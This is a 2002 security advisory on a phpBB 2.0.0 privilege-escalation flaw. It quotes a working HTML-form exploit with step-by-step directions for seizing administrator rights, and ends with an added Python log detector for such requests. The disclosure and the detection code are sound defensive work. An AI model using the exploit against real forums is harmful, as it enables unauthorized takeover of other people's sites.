SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   phpBB
Vendors:   phpBB Group
phpBB Forum Bug in 'admin_ug_auth.php' Lets Remote Authenticated Users Gain Administrative Privileges on the Forum
SecurityTracker Alert ID:  1005495
SecurityTracker URL:  http://securitytracker.com/id/1005495
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 29 2002
Impact:   Modification of system information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.0
Description:   A vulnerability was reported in phpBB version 2.0.0. A remote authenticated user can gain administrative privileges on the forum.

It is reported that any remote authenticated user can POST to the admin_ug_auth.php script (which is used to set permissions). According to the report, administrative privileges are required to view the page, but the script accepts POST data without checking the user's privileges.

A demonstration exploit method is provided in the Source Message.

Impact:   A remote authenticated user can set privileges and gain administrative privileges on the system.
Solution:   It is reported that phpBB versions above 2.0.0 are not vulnerable. New versions are available at:

http://www.phpbb.com/downloads.php

Vendor URL:  www.phpbb.com/
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Privilege Escalation Vulnerability In phpBB 2.0.0




Privilege Escalation Vulnerability In phpBB 2.0.0
-------------------------------------------------

Rootsecure.net recently found a privilege escalation vulnerability 
in "phpBB 2.0.0" which allows any person with a "user" level account to 
escalate their privileges to that of "administrator" level, and therefore 
gain full unrestricted control of a forum.

A coding error exists in the admin_ug_auth.php script (used to set 
permissions), which means that although admin rights are needed to view 
the page, anyone can post data back to it "no questions asked".  
Therefore, if you already know what kind of response the board is looking 
for, you can go straight ahead and tell it directly that you want to give 
admin rights to a specific account.

Demonstration Code
------------------

<html>
<head>
</head>
<body>

<form method="post" 
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

Before using the sample code you must first find out two bits of 
information:

1. The base directory of the board, (usually something like 
http://www.mydomain.com/phpBB2), which is found by taking off index.php 
from the main page URL.
2. The user number of the account you wish to give admin.  To do this go 
to the forum's member list page, click your username, then note down the 
number shown at the right end of the URL you are now at.  (if no users 
have been deleted from the board, then the number next to your username 
on the members list page under the "#" column will also be your true user 
number).

When you have all the information, ensure you log out from the board.  
(otherwise, you will get a permissions error later on).

Now edit the form action in the demonstration code above to be the full 
location of the board's base directory plus the location of the admin 
script.  Usually, this is in a subdirectory from the base directory 
called /admin/.  Your result should look something like this: 
action=http://www.domain_name/board_directory/admin/admin_ug_auth.php.  
Save the changes to your page when you are done.  

Next just call it in a local browser window, typing the user number you 
obtained into the user number box on screen, and hit submit.  On your 
next login, you will have admin rights.

Note: phpBB versions above 2.0.0 are not vulnerable.

Additional information along with downloadable versions of the exploit 
code in the form of a static HTML page, and Perl script can be found at 
http://www.rootsecure.net?menuitem=exploit_code

______________________________
http://www.rootsecure.net/
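
For defenders reviewing web server logs from a board that ran phpBB 2.0.0, the following added example (not part of the advisory or the source message) flags POST requests to admin_ug_auth.php that were not submitted from the board's own admin pages, as happens when the form is loaded from a local file. The combined log format, the host name forum.example and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format (assumed log format).
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def suspicious_posts(lines, board_host, script="/admin/admin_ug_auth.php"):
    """Return (ip, timestamp, reason) for each POST to the permission script
    that was not submitted from the board's own admin pages."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not urlsplit(m["target"]).path.endswith(script):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no referer"   # e.g. form opened from a local file
        else:
            ref = urlsplit(referer)
            if ref.hostname == board_host and "/admin/" in ref.path:
                continue            # submitted from the admin panel itself
            reason = "off-board referer"
        hits.append((m["ip"], m["ts"], reason))
    return hits

# Constructed sample log (documentation IPs, hypothetical host forum.example).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Oct/2002:10:01:12 +0000] "GET /phpBB2/admin/admin_ug_auth.php?mode=user HTTP/1.1" 200 5120 "http://forum.example/phpBB2/admin/index.php" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Oct/2002:10:02:03 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 4312 "http://forum.example/phpBB2/admin/admin_ug_auth.php?mode=user" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Oct/2002:10:05:40 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [29/Oct/2002:10:09:17 +0000] "POST /phpBB2/admin/admin_ug_auth.php HTTP/1.1" 200 4312 "http://other.example/form.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG, "forum.example"):
        print(*hit, sep="  ")
```

The Referer header is set by the client, so treat a hit as a lead to check against the board's current administrator list, not as proof either way.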
